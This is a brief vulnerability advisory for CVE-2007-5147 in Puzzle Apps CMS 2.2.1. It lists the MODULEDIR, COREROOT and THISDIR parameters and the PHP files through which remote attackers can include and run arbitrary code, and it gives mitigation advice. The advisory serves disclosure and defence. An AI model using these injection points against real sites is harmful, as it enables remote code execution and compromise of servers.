CVE-2007-5147

Name of the Vulnerable Software and Affected Versions Puzzle Apps CMS version 2.2.1

Description The issue allows remote attackers to execute arbitrary PHP code. This can be achieved via a URL in the MODULEDIR parameter to various PHP files, including 'core/modules/my/my.module.php' and 'core/modules/xml/xml.module.php'. Additionally, the COREROOT parameter in files such as 'config.loader.php', 'platform.loader.php', and others in the 'core/' directory or 'install/steps/step 3.php' can be exploited. The THISDIR parameter in files like 'people.lib.php', 'general.lib.php', and others in 'core/modules/admin/libs/' or 'core/modules/webstat/MEC/index.php' is also vulnerable.

Recommendations For Puzzle Apps CMS version 2.2.1, consider disabling the MODULEDIR, COREROOT, and THISDIR parameters in the affected PHP files until a patch is available. Restrict access to the vulnerable modules and files, such as 'my.module.php', 'xml.module.php', 'config.loader.php', and others, to minimize the risk of exploitation. Avoid using the MODULEDIR, COREROOT, and THISDIR parameters in the affected API endpoints until the issue is resolved.